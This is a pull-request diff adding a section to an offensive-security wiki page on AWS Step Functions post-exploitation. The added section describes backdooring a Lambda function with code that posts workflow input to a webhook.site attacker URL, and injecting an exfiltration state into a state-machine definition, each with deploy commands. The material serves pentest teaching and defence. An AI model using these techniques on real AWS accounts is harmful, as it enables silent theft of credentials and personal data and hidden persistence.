Merge pull request #172 from kluo84/arte-mr.kluo-UpdateStateMachine

arte-Kluo

Author: carlospolop

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md

@@ -71,6 +71,133 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 
 **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
 
+---
+
+### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode`
+
+An attacker who compromises a user or role with the following permissions:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowUpdateStateMachine",
+      "Effect": "Allow",
+      "Action": "states:UpdateStateMachine",
+      "Resource": "*"
+    },
+    {
+      "Sid": "AllowUpdateFunctionCode",
+      "Effect": "Allow",
+      "Action": "lambda:UpdateFunctionCode",
+      "Resource": "*"
+    }
+  ]
+}
+```
+
+...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation.
+
+This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII.
+
+Example victim invocation:
+
+```bash
+aws stepfunctions start-execution \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
+  --input '{"email": "[email protected]", "password": "hunter2"}' --profile victim
+```
+
+If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**:
+
+---
+
+####  Updated the lambda function
+
+The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data.
+
+```python
+# send_to_attacker.py
+import requests
+
+def lambda_handler(event, context):
+    requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
+    return {"status": "exfiltrated"}
+```
+
+```bash
+zip function.zip send_to_attacker.py
+
+aws lambda update-function-code \
+  --function-name LegitBusinessLogic \
+  --zip-file fileb://function.zip -profile attacker
+```
+
+---
+
+#### Add a Malicious State to the Step Function
+
+Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition.
+
+```malicious_state_definition.json
+{
+  "Comment": "Backdoored for Exfiltration",
+  "StartAt": "OriginalState",
+  "States": {
+    "OriginalState": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
+      "End": true
+    }
+  }
+}
+
+```
+
+```bash
+aws stepfunctions update-state-machine \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
+  --definition file://malicious_state_definition.json --profile attacker
+```
+
+The attacker can even more stealthy to update the state definition to something like this 
+{
+  "Comment": "Backdoored for Exfiltration",
+  "StartAt": "ExfiltrateSecrets",
+  "States": {
+    "ExfiltrateSecrets": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker",
+      "InputPath": "$",
+      "ResultPath": "$.exfil",
+      "Next": "OriginalState"
+    },
+    "OriginalState": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic",
+      "End": true
+    }
+  }  
+}
+ where the victim won't realize the different 
+
+---
+
+### Victim Setup (Context for Exploit)
+
+- A Step Function (`LegitStateMachine`) is used to process sensitive user input.
+- It calls one or more Lambda functions such as `LegitBusinessLogic`.
+
+---
+
+**Potential Impact**:  
+- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
+- No visible errors or failures in workflow execution.
+- Difficult to detect without auditing Lambda code or execution traces.
+- Enables long-term persistence if backdoor remains in code or ASL logic.
+
+
 {{#include ../../../banners/hacktricks-training.md}}